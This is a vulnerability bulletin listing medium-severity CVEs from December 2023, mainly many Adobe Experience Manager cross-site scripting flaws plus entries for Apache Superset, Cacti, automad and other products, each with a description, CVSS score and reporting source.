adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48568
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48569
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48570
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48571
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48572
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48573
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48574
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48575
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48576
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48577
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48578
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48579
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48580
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48581
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48582
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48583
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48584
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48585
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48586
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48587
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48588
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48589
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48590
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48591
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48592
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48593
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48594
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48595
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48596
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48597
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48598
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48599
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48600
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48601
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48602
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48603
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48604
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48605
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48606
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48607
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48609
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48610
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48611
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48612
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48613
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48614
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48615
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48616
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48617
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48618
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48619
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48620
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48621
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48622
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48623
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48624
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51457
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51458
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-205.4CVE-2023-51459
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51460
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51461
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-205.4CVE-2023-51462
psirt@adobe.com
aiven-open -- journalpumpjournalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0.2023-12-216.5CVE-2023-51390
security-advisories@github.com
security-advisories@github.com
ansible -- ansibleAn absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.2023-12-186.3CVE-2023-5115
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
apache -- streamparkIn the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.2023-12-154.9CVE-2023-30867
security@apache.org
apache -- supersetUncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.2023-12-196.5CVE-2023-46104
security@apache.org
security@apache.org
apache -- supersetA where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.2023-12-196.5CVE-2023-49736
security@apache.org
security@apache.org
apple -- macosHCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion.2023-12-215.3CVE-2023-45703
psirt@hcl.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7037
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.7CVE-2023-7036
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.3CVE-2023-7038
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
aveva -- edgeAn issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.2023-12-165.3CVE-2021-42794
cve@mitre.org
cve@mitre.org
cve@mitre.org
aws -- aws-sdk-phpAWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1.2023-12-226CVE-2023-51651
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bazarr -- bazarrBazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.2023-12-155.3CVE-2023-50266
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
beijing_baichuo -- s210A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688.2023-12-216.3CVE-2023-7039
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
bosch -- building_integration_system_video_engineAn improper handling of a malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server e.g. through Man-in-the-Middle attacks.2023-12-185.9CVE-2023-35867
psirt@bosch.com
bosch -- cpp14_firmwareAn information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet.2023-12-185.3CVE-2022-41677
psirt@bosch.com
cacti -- cactiCacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability - execution of arbitrary javascript code in the attacked user's browser. This issue has been patched in version 1.2.26.2023-12-226.1CVE-2023-49086
security-advisories@github.com
cacti -- cactiCacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti.2023-12-226.1CVE-2023-49088
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
cacti -- cactiCacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available.2023-12-225.4CVE-2023-50250
security-advisories@github.com
security-advisories@github.com
clear -- clearml_serverCross-site Scripting (XSS) - Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (I.e when a malicious party already has access to the internal network and to a user's ClearML login credentials).2023-12-185.4CVE-2023-6778
security@huntr.dev
security@huntr.dev
clickhouse -- clickhouseClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited.2023-12-215.9CVE-2023-48298
security-advisories@github.com
security-advisories@github.com
codelyfe -- stupid_simple_cmsA vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability.2023-12-215.4CVE-2023-7041
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe -- stupid_simple_cmsA vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability.2023-12-214.3CVE-2023-7040
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
corveda -- phpsandboxA vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability.2023-12-194.3CVE-2014-125107
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
csharp -- cws_collaborative_development_platformSmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.2023-12-156.5CVE-2023-48374
twcert@cert.org.tw
dell -- cpg_biosDell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system.2023-12-226.7CVE-2023-39251
security_alert@emc.com
dell -- emc_networkerDell NetWorker Virtual Edition versions 19.8 and below contains the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure.2023-12-185.3CVE-2023-28053
security_alert@emc.com
dfir-iris -- iris-webIris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available.2023-12-224.6CVE-2023-50712
security-advisories@github.com
security-advisories@github.com
dfirkuiper -- kuiperA vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.2023-12-185.9CVE-2023-6908
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
